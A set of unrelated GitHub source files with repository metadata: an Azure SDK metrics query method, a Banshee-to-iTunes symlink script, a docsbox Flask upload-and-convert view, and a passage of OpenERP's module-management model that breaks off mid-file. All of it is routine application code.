:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: Response or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.monitor.models.Response or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ErrorResponseException<azure.mgmt.monitor.models.ErrorResponseException>`
"""
# Construct URL
url = '/{resourceUri}/providers/microsoft.insights/metrics'
path_format_arguments = {
'resourceUri': self._serialize.url("resource_uri", resource_uri, 'str', skip_quote=True)
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
if timespan is not None:
query_parameters['timespan'] = self._serialize.query("timespan", timespan, 'str')
if interval is not None:
query_parameters['interval'] = self._serialize.query("interval", interval, 'duration')
if metric is not None:
query_parameters['metric'] = self._serialize.query("metric", metric, 'str')
if aggregation is not None:
query_parameters['aggregation'] = self._serialize.query("aggregation", aggregation, 'str')
if top is not None:
query_parameters['$top'] = self._serialize.query("top", top, 'float')
if orderby is not None:
query_parameters['$orderby'] = self._serialize.query("orderby", orderby, 'str')
if filter is not None:
query_parameters['$filter'] = self._serialize.query("filter", filter, 'str')
if result_type is not None:
query_parameters['resultType'] = self._serialize.query("result_type", result_type, 'ResultType')
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
raise models.ErrorResponseException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Response', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
| {
"content_hash": "d6d69854e7ae357a0ca07f220f53ef5f",
"timestamp": "",
"source": "github",
"line_count": 130,
"max_line_length": 200,
"avg_line_length": 47.43846153846154,
"alnum_prop": 0.6416409923787904,
"repo_name": "AutorestCI/azure-sdk-for-python",
"id": "aca37e3d615383dfcfc6ef9b6a8b5dd98d19699e",
"size": "6697",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "azure-mgmt-monitor/azure/mgmt/monitor/operations/metrics_operations.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "34619070"
}
],
"symlink_target": ""
} |
import sys, shutil, hashlib, os.path, urllib.parse, sqlite3
target_dir = os.path.expanduser("~/.banshee2itunes")
# remove the data directory if it exists
if os.path.lexists(target_dir):
shutil.rmtree(target_dir)
os.makedirs(target_dir + "/music/")
# make an in-memory copy of the database in case Banshee changes it while
# we're using it
#
# http://stackoverflow.com/q/4019081/612279
db = sqlite3.connect(":memory:")
live_db = sqlite3.connect(os.path.expanduser("~/.config/banshee-1/banshee.db"))
query = "".join(line for line in live_db.iterdump())
db.executescript(query)
db.commit()
live_db.close()
# get a complete list of tracks in Banshee
c = db.cursor()
c.execute("SELECT Uri FROM CoreTracks WHERE PrimarySourceID = 1")
for row in c:
uri = urllib.parse.urlparse(row[0])
if uri.scheme == "file":
path = urllib.parse.unquote(uri.path)
if not os.path.isfile(path):
sys.stderr.write("File \"{}\" is in library but does not exist (?)".format(path))
continue
# the original idea was to use the file's hash as part of the
# name of the symlink, but that doesn't really provide any benefits
# and can potentially result in many GBs of reads
#
# instead just hash the path
hash_val = hashlib.sha1(path.encode("utf-8")).hexdigest()
ext = os.path.splitext(path)[1].lower()
os.symlink(path, target_dir + "/music/" + hash_val + ext)
| {
"content_hash": "ec9770837860a42a9adffbfc8a7198c4",
"timestamp": "",
"source": "github",
"line_count": 46,
"max_line_length": 84,
"avg_line_length": 29.891304347826086,
"alnum_prop": 0.7025454545454546,
"repo_name": "chriskuehl/banshee2itunes",
"id": "ac986ef49acc91b5630af100fc45148aba2352a9",
"size": "1398",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "banshee2itunes.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "1816"
}
],
"symlink_target": ""
} |
import ujson
import datetime
from magic import Magic
from tempfile import NamedTemporaryFile
from flask import request
from flask_restful import Resource, abort
from docsbox import app, rq
from docsbox.docs.tasks import remove_file, process_document
class DocumentView(Resource):
def get(self, task_id):
"""
Returns information about task status.
"""
queue = rq.get_queue()
task = queue.fetch_job(task_id)
if task:
return {
"id": task.id,
"status": task.status,
"result_url": task.result
}
else:
return abort(404, message="Unknown task_id")
class DocumentCreateView(Resource):
def post(self):
"""
Recieves file and options, checks file mimetype,
validates options and creates converting task
"""
if "file" not in request.files:
return abort(400, message="file field is required")
else:
with NamedTemporaryFile(delete=False, prefix=app.config["MEDIA_PATH"]) as tmp_file:
request.files["file"].save(tmp_file)
tmp_file.flush()
tmp_file.close()
remove_file.schedule(
datetime.timedelta(seconds=app.config["ORIGINAL_FILE_TTL"])
, tmp_file.name)
with Magic() as magic: # detect mimetype
mimetype = magic.from_file(tmp_file.name)
if mimetype not in app.config["SUPPORTED_MIMETYPES"]:
return abort(400, message="Not supported mimetype: '{0}'".format(mimetype))
options = request.form.get("options", None)
if options: # options validation
options = ujson.loads(options)
formats = options.get("formats", None)
if not isinstance(formats, list) or not formats:
return abort(400, message="Invalid 'formats' value")
else:
for fmt in formats:
supported = (fmt in app.config["SUPPORTED_MIMETYPES"][mimetype]["formats"])
if not supported:
message = "'{0}' mimetype can't be converted to '{1}'"
return abort(400, message=message.format(mimetype, fmt))
thumbnails = options.get("thumbnails", None)
if thumbnails:
if not isinstance(thumbnails, dict):
return abort(400, message="Invalid 'thumbnails' value")
else:
thumbnails_size = thumbnails.get("size", None)
if not isinstance(thumbnails_size, str) or not thumbnails_size:
return abort(400, message="Invalid 'size' value")
else:
try:
(width, height) = map(int, thumbnails_size.split("x"))
except ValueError:
return abort(400, message="Invalid 'size' value")
else:
options["thumbnails"]["size"] = (width, height)
else:
if mimetype == "application/pdf":
options = {
"formats": ["html"]
}
else:
options = app.config["DEFAULT_OPTIONS"]
task = process_document.queue(tmp_file.name, options, {
"mimetype": mimetype,
})
return {
"id": task.id,
"status": task.status,
}
| {
"content_hash": "39ccb28d37f005a9027ad4c9dad13c24",
"timestamp": "",
"source": "github",
"line_count": 93,
"max_line_length": 103,
"avg_line_length": 41.56989247311828,
"alnum_prop": 0.4813760993274703,
"repo_name": "docsbox/docsbox",
"id": "87bbca0db647e6dffb2f20254ca8a278c1ac87f4",
"size": "3866",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "docsbox/docs/views.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "15637"
}
],
"symlink_target": ""
} |
from docutils import nodes
from docutils.core import publish_string
from docutils.transforms import Transform, writer_aux
from docutils.writers.html4css1 import Writer
import imp
import logging
from operator import attrgetter
import os
import re
import shutil
import tempfile
import urllib
import urllib2
import urlparse
import zipfile
import zipimport
import lxml.html
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO # NOQA
import openerp
import openerp.exceptions
from openerp import modules, tools
from openerp.modules.db import create_categories
from openerp.modules import get_module_resource
from openerp.tools.parse_version import parse_version
from openerp.tools.translate import _
from openerp.osv import osv, orm, fields
from openerp import api, fields as fields2
_logger = logging.getLogger(__name__)
ACTION_DICT = {
'view_type': 'form',
'view_mode': 'form',
'res_model': 'base.module.upgrade',
'target': 'new',
'type': 'ir.actions.act_window',
'nodestroy': True,
}
def backup(path, raise_exception=True):
path = os.path.normpath(path)
if not os.path.exists(path):
if not raise_exception:
return None
raise OSError('path does not exists')
cnt = 1
while True:
bck = '%s~%d' % (path, cnt)
if not os.path.exists(bck):
shutil.move(path, bck)
return bck
cnt += 1
class module_category(osv.osv):
_name = "ir.module.category"
_description = "Application"
def _module_nbr(self, cr, uid, ids, prop, unknow_none, context):
cr.execute('SELECT category_id, COUNT(*) \
FROM ir_module_module \
WHERE category_id IN %(ids)s \
OR category_id IN (SELECT id \
FROM ir_module_category \
WHERE parent_id IN %(ids)s) \
GROUP BY category_id', {'ids': tuple(ids)}
)
result = dict(cr.fetchall())
for id in ids:
cr.execute('select id from ir_module_category where parent_id=%s', (id,))
result[id] = sum([result.get(c, 0) for (c,) in cr.fetchall()],
result.get(id, 0))
return result
_columns = {
'name': fields.char("Name", required=True, translate=True, select=True),
'parent_id': fields.many2one('ir.module.category', 'Parent Application', select=True),
'child_ids': fields.one2many('ir.module.category', 'parent_id', 'Child Applications'),
'module_nr': fields.function(_module_nbr, string='Number of Modules', type='integer'),
'module_ids': fields.one2many('ir.module.module', 'category_id', 'Modules'),
'description': fields.text("Description", translate=True),
'sequence': fields.integer('Sequence'),
'visible': fields.boolean('Visible'),
'xml_id': fields.function(osv.osv.get_external_id, type='char', string="External ID"),
}
_order = 'name'
_defaults = {
'visible': 1,
}
class MyFilterMessages(Transform):
"""
Custom docutils transform to remove `system message` for a document and
generate warnings.
(The standard filter removes them based on some `report_level` passed in
the `settings_override` dictionary, but if we use it, we can't see them
and generate warnings.)
"""
default_priority = 870
def apply(self):
for node in self.document.traverse(nodes.system_message):
_logger.warning("docutils' system message present: %s", str(node))
node.parent.remove(node)
class MyWriter(Writer):
"""
Custom docutils html4ccs1 writer that doesn't add the warnings to the
output document.
"""
def get_transforms(self):
return [MyFilterMessages, writer_aux.Admonitions]
class module(osv.osv):
_name = "ir.module.module"
_rec_name = "shortdesc"
_description = "Module"
def fields_view_get(self, cr, uid, view_id=None, view_type='form', context=None, toolbar=False, submenu=False):
res = super(module, self).fields_view_get(cr, uid, view_id=view_id, view_type=view_type, context=context, toolbar=toolbar, submenu=False)
result = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'base', 'action_server_module_immediate_install')[1]
if view_type == 'form':
if res.get('toolbar',False):
list = [rec for rec in res['toolbar']['action'] if rec.get('id', False) != result]
res['toolbar'] = {'action': list}
return res
@classmethod
def get_module_info(cls, name):
info = {}
try:
info = modules.load_information_from_description_file(name)
except Exception:
_logger.debug('Error when trying to fetch informations for '
'module %s', name, exc_info=True)
return info
def _get_desc(self, cr, uid, ids, field_name=None, arg=None, context=None):
res = dict.fromkeys(ids, '')
for module in self.browse(cr, uid, ids, context=context):
path = get_module_resource(module.name, 'static/description/index.html')
if path:
with tools.file_open(path, 'rb') as desc_file:
doc = desc_file.read()
html = lxml.html.document_fromstring(doc)
for element, attribute, link, pos in html.iterlinks():
if element.get('src') and not '//' in element.get('src') and not 'static/' in element.get('src'):
element.set('src', "/%s/static/description/%s" % (module.name, element.get('src')))
res[module.id] = lxml.html.tostring(html)
else:
overrides = {
'embed_stylesheet': False,
'doctitle_xform': False,
'output_encoding': 'unicode',
'xml_declaration': False,
}
output = publish_string(source=module.description or '', settings_overrides=overrides, writer=MyWriter())
res[module.id] = output
return res
def _get_latest_version(self, cr, uid, ids, field_name=None, arg=None, context=None):
default_version = modules.adapt_version('1.0')
res = dict.fromkeys(ids, default_version)
for m in self.browse(cr, uid, ids):
res[m.id] = self.get_module_info(m.name).get('version', default_version)
return res
def _get_views(self, cr, uid, ids, field_name=None, arg=None, context=None):
res = {}
model_data_obj = self.pool.get('ir.model.data')
dmodels = []
if field_name is None or 'views_by_module' in field_name:
dmodels.append('ir.ui.view')
if field_name is None or 'reports_by_module' in field_name:
dmodels.append('ir.actions.report.xml')
if field_name is None or 'menus_by_module' in field_name:
dmodels.append('ir.ui.menu')
assert dmodels, "no models for %s" % field_name
for module_rec in self.browse(cr, uid, ids, context=context):
res_mod_dic = res[module_rec.id] = {
'menus_by_module': [],
'reports_by_module': [],
'views_by_module': []
}
# Skip uninstalled modules below, no data to find anyway.
if module_rec.state not in ('installed', 'to upgrade', 'to remove'):
continue
# then, search and group ir.model.data records
imd_models = dict([(m, []) for m in dmodels])
imd_ids = model_data_obj.search(cr, uid, [
('module', '=', module_rec.name),
('model', 'in', tuple(dmodels))
])
for imd_res in model_data_obj.read(cr, uid, imd_ids, ['model', 'res_id'], context=context):
imd_models[imd_res['model']].append(imd_res['res_id'])
def browse(model):
M = self.pool[model]
# as this method is called before the module update, some xmlid may be invalid at this stage
# explictly filter records before reading them
ids = M.exists(cr, uid, imd_models.get(model, []), context)
return M.browse(cr, uid, ids, context)
def format_view(v):
aa = v.inherit_id and '* INHERIT ' or ''
return '%s%s (%s)' % (aa, v.name, v.type)
res_mod_dic['views_by_module'] = map(format_view, browse('ir.ui.view'))
res_mod_dic['reports_by_module'] = map(attrgetter('name'), browse('ir.actions.report.xml'))
res_mod_dic['menus_by_module'] = map(attrgetter('complete_name'), browse('ir.ui.menu'))
for key in res.iterkeys():
for k, v in res[key].iteritems():
res[key][k] = "\n".join(sorted(v))
return res
def _get_icon_image(self, cr, uid, ids, field_name=None, arg=None, context=None):
res = dict.fromkeys(ids, '')
for module in self.browse(cr, uid, ids, context=context):
path = get_module_resource(module.name, 'static', 'description', 'icon.png')
if path:
image_file = tools.file_open(path, 'rb')
try:
res[module.id] = image_file.read().encode('base64')
finally:
image_file.close()
return res
_columns = {
'name': fields.char("Technical Name", readonly=True, required=True, select=True),
'category_id': fields.many2one('ir.module.category', 'Category', readonly=True, select=True),
'shortdesc': fields.char('Module Name', readonly=True, translate=True),
'summary': fields.char('Summary', readonly=True, translate=True),
'description': fields.text("Description", readonly=True, translate=True),
'description_html': fields.function(_get_desc, string='Description HTML', type='html', method=True, readonly=True),
'author': fields.char("Author", readonly=True),
'maintainer': fields.char('Maintainer', readonly=True),
'contributors': fields.text('Contributors', readonly=True),
'website': fields.char("Website", readonly=True),
# attention: Incorrect field names !!
# installed_version refers the latest version (the one on disk)
# latest_version refers the installed version (the one in database)
# published_version refers the version available on the repository
'installed_version': fields.function(_get_latest_version, string='Latest Version', type='char'),
'latest_version': fields.char('Installed Version', readonly=True),
'published_version': fields.char('Published Version', readonly=True),
'url': fields.char('URL', readonly=True),
'sequence': fields.integer('Sequence'),
'dependencies_id': fields.one2many('ir.module.module.dependency', 'module_id', 'Dependencies', readonly=True),
'auto_install': fields.boolean('Automatic Installation',
help='An auto-installable module is automatically installed by the '
'system when all its dependencies are satisfied. '
'If the module has no dependency, it is always installed.'),
'state': fields.selection([
('uninstallable', 'Not Installable'),
('uninstalled', 'Not Installed'),
('installed', 'Installed'),
('to upgrade', 'To be upgraded'),
('to remove', 'To be removed'),
('to install', 'To be installed')
], string='Status', readonly=True, select=True),
'demo': fields.boolean('Demo Data', readonly=True),
'license': fields.selection([
('GPL-2', 'GPL Version 2'),
('GPL-2 or any later version', 'GPL-2 or later version'),
('GPL-3', 'GPL Version 3'),
('GPL-3 or any later version', 'GPL-3 or later version'),
('AGPL-3', 'Affero GPL-3'),
('Other OSI approved licence', 'Other OSI Approved Licence'),
('Other proprietary', 'Other Proprietary')
], string='License', readonly=True),
'menus_by_module': fields.function(_get_views, string='Menus', type='text', multi="meta", store=True),
'reports_by_module': fields.function(_get_views, string='Reports', type='text', multi="meta", store=True),
'views_by_module': fields.function(_get_views, string='Views', type='text', multi="meta", store=True),
'application': fields.boolean('Application', readonly=True),
'icon': fields.char('Icon URL'),
'icon_image': fields.function(_get_icon_image, string='Icon', type="binary"),
}
_defaults = {
'state': 'uninstalled',
'sequence': 100,
'demo': False,
'license': 'AGPL-3',
}
_order = 'sequence,name'
def _name_uniq_msg(self, cr, uid, ids, context=None):
return _('The name of the module must be unique !')
_sql_constraints = [
('name_uniq', 'UNIQUE (name)', _name_uniq_msg),
]
def unlink(self, cr, uid, ids, context=None):
if not ids:
return True
if isinstance(ids, (int, long)):
ids = [ids]
mod_names = []
for mod in self.read(cr, uid, ids, ['state', 'name'], context):
if mod['state'] in ('installed', 'to upgrade', 'to remove', 'to install'):
raise orm.except_orm(_('Error'), _('You try to remove a module that is installed or will be installed'))
mod_names.append(mod['name'])
#Removing the entry from ir_model_data
#ids_meta = self.pool.get('ir.model.data').search(cr, uid, [('name', '=', 'module_meta_information'), ('module', 'in', mod_names)])
#if ids_meta:
# self.pool.get('ir.model.data').unlink(cr, uid, ids_meta, context)
return super(module, self).unlink(cr, uid, ids, context=context)
@staticmethod
def _check_external_dependencies(terp):
depends = terp.get('external_dependencies')
if not depends:
return
for pydep in depends.get('python', []):
parts = pydep.split('.')
parts.reverse()
path = None
while parts:
part = parts.pop()
try:
_, path, _ = imp.find_module(part, path and [path] or None)
except ImportError:
raise ImportError('No module named %s' % (pydep,))
for binary in depends.get('bin', []):
if tools.find_in_path(binary) is None:
raise Exception('Unable to find %r in path' % (binary,))
@classmethod
def check_external_dependencies(cls, module_name, newstate='to install'):
terp = cls.get_module_info(module_name)
try:
cls._check_external_dependencies(terp)
except Exception, e:
if newstate == 'to install':
msg = _('Unable to install module "%s" because an external dependency is not met: %s')
elif newstate == 'to upgrade':
msg = _('Unable to upgrade module "%s" because an external dependency is not met: %s')
else:
msg = _('Unable to process module "%s" because an external dependency is not met: %s')
raise orm.except_orm(_('Error'), msg % (module_name, e.args[0]))
@api.multi
def state_update(self, newstate, states_to_update, level=100):
if level < 1:
raise orm.except_orm(_('Error'), _('Recursion error in modules dependencies !'))
# whether some modules are installed with demo data
demo = False
for module in self:
# determine dependency modules to update/others
update_mods, ready_mods = self.browse(), self.browse()
for dep in module.dependencies_id:
if dep.state == 'unknown':
raise orm.except_orm(_('Error'), _("You try to install module '%s' that depends on module '%s'.\nBut the latter module is not available in your system.") % (module.name, dep.name,))
if dep.depend_id.state == newstate:
ready_mods += dep.depend_id
else:
update_mods += dep.depend_id
# update dependency modules that require it, and determine demo for module
update_demo = update_mods.state_update(newstate, states_to_update, level=level-1)
module_demo = module.demo or update_demo or any(mod.demo for mod in ready_mods)
demo = demo or module_demo
# check dependencies and update module itself
self.check_external_dependencies(module.name, newstate)
if module.state in states_to_update:
module.write({'state': newstate, 'demo': module_demo})
return demo
def button_install(self, cr, uid, ids, context=None):
# Mark the given modules to be installed.
self.state_update(cr, uid, ids, 'to install', ['uninstalled'], context=context)
# Mark (recursively) the newly satisfied modules to also be installed
# Select all auto-installable (but not yet installed) modules.
domain = [('state', '=', 'uninstalled'), ('auto_install', '=', True)]
uninstalled_ids = self.search(cr, uid, domain, context=context)
uninstalled_modules = self.browse(cr, uid, uninstalled_ids, context=context)
# Keep those with:
# - all dependencies satisfied (installed or to be installed),
# - at least one dependency being 'to install'
satisfied_states = frozenset(('installed', 'to install', 'to upgrade'))
def all_depencies_satisfied(m):
states = set(d.state for d in m.dependencies_id)
return states.issubset(satisfied_states) and ('to install' in states)
to_install_modules = filter(all_depencies_satisfied, uninstalled_modules)
to_install_ids = map(lambda m: m.id, to_install_modules)
# Mark them to be installed.
if to_install_ids:
self.button_install(cr, uid, to_install_ids, context=context)
return dict(ACTION_DICT, name=_('Install'))
def button_immediate_install(self, cr, uid, ids, context=None):
""" Installs the selected module(s) immediately and fully,
returns the next res.config action to execute
:param ids: identifiers of the modules to install
:returns: next res.config item to execute
:rtype: dict[str, object]
"""
return self._button_immediate_function(cr, uid, ids, self.button_install, context=context)
def button_install_cancel(self, cr, uid, ids, context=None):
self.write(cr, uid, ids, {'state': 'uninstalled', 'demo': False})
return True
def module_uninstall(self, cr, uid, ids, context=None):
"""Perform the various steps required to uninstall a module completely
including the deletion of all database structures created by the module:
tables, columns, constraints, etc."""
ir_model_data = self.pool.get('ir.model.data')
modules_to_remove = [m.name for m in self.browse(cr, uid, ids, context)]
ir_model_data._module_data_uninstall(cr, uid, modules_to_remove, context)
self.write(cr, uid, ids, {'state': 'uninstalled'})
return True
def downstream_dependencies(self, cr, uid, ids, known_dep_ids=None,
exclude_states=['uninstalled', 'uninstallable', 'to remove'],
context=None):
"""Return the ids of all modules that directly or indirectly depend
on the given module `ids`, and that satisfy the `exclude_states`
filter"""
if not ids:
return []
known_dep_ids = set(known_dep_ids or [])
cr.execute('''SELECT DISTINCT m.id
FROM
ir_module_module_dependency d
JOIN
ir_module_module m ON (d.module_id=m.id)
WHERE
d.name IN (SELECT name from ir_module_module where id in %s) AND
m.state NOT IN %s AND
m.id NOT IN %s ''',
(tuple(ids), tuple(exclude_states), tuple(known_dep_ids or ids)))
new_dep_ids = set([m[0] for m in cr.fetchall()])
missing_mod_ids = new_dep_ids - known_dep_ids
known_dep_ids |= new_dep_ids
if missing_mod_ids:
known_dep_ids |= set(self.downstream_dependencies(cr, uid, list(missing_mod_ids),
known_dep_ids, exclude_states, context))
return list(known_dep_ids)
def _button_immediate_function(self, cr, uid, ids, function, context=None):
function(cr, uid, ids, context=context)
cr.commit()
api.Environment.reset()
registry = openerp.modules.registry.RegistryManager.new(cr.dbname, update_module=True)
config = registry['res.config'].next(cr, uid, [], context=context) or {}
if config.get('type') not in ('ir.actions.act_window_close',):
return config
# reload the client; open the first available root menu
menu_obj = registry['ir.ui.menu']
menu_ids = menu_obj.search(cr, uid, [('parent_id', '=', False)], context=context)
return {
'type': 'ir.actions.client',
'tag': 'reload',
'params': {'menu_id': menu_ids and menu_ids[0] or False}
}
#TODO remove me in master, not called anymore
def button_immediate_uninstall(self, cr, uid, ids, context=None):
"""
Uninstall the selected module(s) immediately and fully,
returns the next res.config action to execute
"""
return self._button_immediate_function(cr, uid, ids, self.button_uninstall, context=context)
def button_uninstall(self, cr, uid, ids, context=None):
if any(m.name == 'base' for m in self.browse(cr, uid, ids, context=context)):
raise orm.except_orm(_('Error'), _("The `base` module cannot be uninstalled"))
dep_ids = self.downstream_dependencies(cr, uid, ids, context=context)
self.write(cr, uid, ids + dep_ids, {'state': 'to remove'})
return dict(ACTION_DICT, name=_('Uninstall'))
def button_uninstall_cancel(self, cr, uid, ids, context=None):
self.write(cr, uid, ids, {'state': 'installed'})
return True
def button_immediate_upgrade(self, cr, uid, ids, context=None):
"""
Upgrade the selected module(s) immediately and fully,
return the next res.config action to execute
"""
return self._button_immediate_function(cr, uid, ids, self.button_upgrade, context=context)
def button_upgrade(self, cr, uid, ids, context=None):
depobj = self.pool.get('ir.module.module.dependency')
todo = list(self.browse(cr, uid, ids, context=context))
self.update_list(cr, uid)
i = 0
while i < len(todo):
mod = todo[i]
i += 1
if mod.state not in ('installed', 'to upgrade'):
raise orm.except_orm(_('Error'), _("Can not upgrade module '%s'. It is not installed.") % (mod.name,))
self.check_external_dependencies(mod.name, 'to upgrade')
iids = depobj.search(cr, uid, [('name', '=', mod.name)], context=context)
for dep in depobj.browse(cr, uid, iids, context=context):
if dep.module_id.state == 'installed' and dep.module_id not in todo:
todo.append(dep.module_id)
ids = map(lambda x: x.id, todo)
self.write(cr, uid, ids, {'state': 'to upgrade'}, context=context)
to_install = []
for mod in todo:
for dep in mod.dependencies_id:
if dep.state == 'unknown':
raise orm.except_orm(_('Error'), _('You try to upgrade a module that depends on the module: %s.\nBut this module is not available in your system.') % (dep.name,))
if dep.state == 'uninstalled':
ids2 = self.search(cr, uid, [('name', '=', dep.name)])
to_install.extend(ids2)
self.button_install(cr, uid, to_install, context=context)
return dict(ACTION_DICT, name=_('Apply Schedule Upgrade'))
def button_upgrade_cancel(self, cr, uid, ids, context=None):
self.write(cr, uid, ids, {'state': 'installed'})
return True
def button_update_translations(self, cr, uid, ids, context=None):
self.update_translations(cr, uid, ids)
return True
@staticmethod
def get_values_from_terp(terp):
return {
'description': terp.get('description', ''),
'shortdesc': terp.get('name', ''),
'author': terp.get('author', 'Unknown'),
'maintainer': terp.get('maintainer', False),
'contributors': ', '.join(terp.get('contributors', [])) or False,
'website': terp.get('website', ''),
'license': terp.get('license', 'AGPL-3'),
'sequence': terp.get('sequence', 100),
'application': terp.get('application', False),
'auto_install': terp.get('auto_install', False),
'icon': terp.get('icon', False),
'summary': terp.get('summary', ''),
}
def create(self, cr, uid, vals, context=None):
new_id = super(module, self).create(cr, uid, vals, context=context)
module_metadata = {
'name': 'module_%s' % vals['name'],
'model': 'ir.module.module',
'module': 'base',
'res_id': new_id,
'noupdate': True,
}
self.pool['ir.model.data'].create(cr, uid, module_metadata)
return new_id
# update the list of available packages
def update_list(self, cr, uid, context=None):
res = [0, 0] # [update, add]
default_version = modules.adapt_version('1.0')
known_mods = self.browse(cr, uid, self.search(cr, uid, []))
known_mods_names = dict([(m.name, m) for m in known_mods])
# iterate through detected modules and update/create them in db
for mod_name in modules.get_modules():
mod = known_mods_names.get(mod_name)
terp = self.get_module_info(mod_name)
values = self.get_values_from_terp(terp)
if mod:
updated_values = {}
for key in values:
old = getattr(mod, key)
updated = isinstance(values[key], basestring) and tools.ustr(values[key]) or values[key]
if (old or updated) and updated != old:
updated_values[key] = values[key]
if terp.get('installable', True) and mod.state == 'uninstallable':
updated_values['state'] = 'uninstalled'
if parse_version(terp.get('version', default_version)) > parse_version(mod.latest_version or default_version):
res[0] += 1
if updated_values:
self.write(cr, uid, mod.id, updated_values)
else:
mod_path = modules.get_module_path(mod_name)
if not mod_path:
continue
if not terp or not terp.get('installable', True):
continue
id = self.create(cr, uid, dict(name=mod_name, state='uninstalled', **values))
mod = self.browse(cr, uid, id)
res[1] += 1
self._update_dependencies(cr, uid, mod, terp.get('depends', []))
self._update_category(cr, uid, mod, terp.get('category', 'Uncategorized'))
# Trigger load_addons if new module have been discovered it exists on
# wsgi handlers, so they can react accordingly
if tuple(res) != (0, 0):
for handler in openerp.service.wsgi_server.module_handlers:
if hasattr(handler, 'load_addons'):
handler.load_addons()
return res
def download(self, cr, uid, ids, download=True, context=None):
return []
def install_from_urls(self, cr, uid, urls, context=None):
if not self.pool['res.users'].has_group(cr, uid, 'base.group_system'):
raise openerp.exceptions.AccessDenied()
apps_server = urlparse.urlparse(self.get_apps_server(cr, uid, context=context))
OPENERP = 'openerp'
tmp = tempfile.mkdtemp()
_logger.debug('Install from url: %r', urls)
try:
# 1. Download & unzip missing modules
for module_name, url in urls.items():
if not url:
continue # nothing to download, local version is already the last one
up = urlparse.urlparse(url)
if up.scheme != apps_server.scheme or up.netloc != apps_server.netloc:
raise openerp.exceptions.AccessDenied()
try:
_logger.info('Downloading module `%s` from OpenERP Apps', module_name)
content = urllib2.urlopen(url).read()
except Exception:
_logger.exception('Failed to fetch module %s', module_name)
raise osv.except_osv(_('Module not found'),
_('The `%s` module appears to be unavailable at the moment, please try again later.') % module_name)
else:
zipfile.ZipFile(StringIO(content)).extractall(tmp)
assert os.path.isdir(os.path.join(tmp, module_name))
# 2a. Copy/Replace module source in addons path
for module_name, url in urls.items():
if module_name == OPENERP or not url:
continue # OPENERP is special case, handled below, and no URL means local module
module_path = modules.get_module_path(module_name, downloaded=True, display_warning=False)
bck = backup(module_path, False)
_logger.info('Copy downloaded module `%s` to `%s`', module_name, module_path)
shutil.move(os.path.join(tmp, module_name), module_path)
if bck:
shutil.rmtree(bck)
# 2b. Copy/Replace server+base module source if downloaded
if urls.get(OPENERP, None):
# special case. it contains the server and the base module.
# extract path is not the same
base_path = os.path.dirname(modules.get_module_path('base'))
# copy all modules in the SERVER/openerp/addons directory to the new "openerp" module (except base itself)
for d in os.listdir(base_path):
if d != 'base' and os.path.isdir(os.path.join(base_path, d)):
destdir = os.path.join(tmp, OPENERP, 'addons', d) # XXX 'openerp' subdirectory ?
shutil.copytree(os.path.join(base_path, d), destdir)
# then replace the server by the new "base" module
server_dir = openerp.tools.config['root_path'] # XXX or dirname()
bck = backup(server_dir)
_logger.info('Copy downloaded module `openerp` to `%s`', server_dir)
shutil.move(os.path.join(tmp, OPENERP), server_dir)
#if bck:
# shutil.rmtree(bck)
self.update_list(cr, uid, context=context)
with_urls = [m for m, u in urls.items() if u]
downloaded_ids = self.search(cr, uid, [('name', 'in', with_urls)], context=context)
already_installed = self.search(cr, uid, [('id', 'in', downloaded_ids), ('state', '=', 'installed')], context=context)
to_install_ids = self.search(cr, uid, [('name', 'in', urls.keys()), ('state', '=', 'uninstalled')], context=context)
post_install_action = self.button_immediate_install(cr, uid, to_install_ids, context=context)
if already_installed:
# in this case, force server restart to reload python code...
cr.commit()
openerp.service.server.restart()
return {
'type': 'ir.actions.client',
'tag': 'home',
'params': {'wait': True},
}
return post_install_action
finally:
shutil.rmtree(tmp)
def get_apps_server(self, cr, uid, context=None):
return tools.config.get('apps_server', 'https://apps.openerp.com/apps')
def _update_dependencies(self, cr, uid, mod_browse, depends=None):
if depends is None:
depends = []
existing = set(x.name for x in mod_browse.dependencies_id)
needed = set(depends)
for dep in (needed - existing):
cr.execute('INSERT INTO ir_module_module_dependency (module_id, name) values (%s, %s)', (mod_browse.id, dep))
for dep in (existing - needed):
cr.execute('DELETE FROM ir_module_module_dependency WHERE module_id = %s and name = %s', (mod_browse.id, dep))
self.invalidate_cache(cr, uid, ['dependencies_id'], [mod_browse.id])
def _update_category(self, cr, uid, mod_browse, category='Uncategorized'):
current_category = mod_browse.category_id
current_category_path = []
while current_category:
current_category_path.insert(0, current_category.name)
current_category = current_category.parent_id
categs = category.split('/')
if categs != current_category_path:
cat_id = create_categories(cr, categs)
mod_browse.write({'category_id': cat_id})
def update_translations(self, cr, uid, ids, filter_lang=None, context=None):
if not filter_lang:
res_lang = self.pool.get('res.lang')
lang_ids = res_lang.search(cr, uid, [('translatable', '=', True)])
filter_lang = [lang.code for lang in res_lang.browse(cr, uid, lang_ids)]
elif not isinstance(filter_lang, (list, tuple)):
filter_lang = [filter_lang]
modules = [m.name for m in self.browse(cr, uid, ids) if m.state == 'installed']
self.pool.get('ir.translation').load_module_terms(cr, modules, filter_lang, context=context)
def check(self, cr, uid, ids, context=None):
for mod in self.browse(cr, uid, ids, context=context):
if not mod.description:
_logger.warning('module %s: description is empty !', mod.name)
DEP_STATES = [
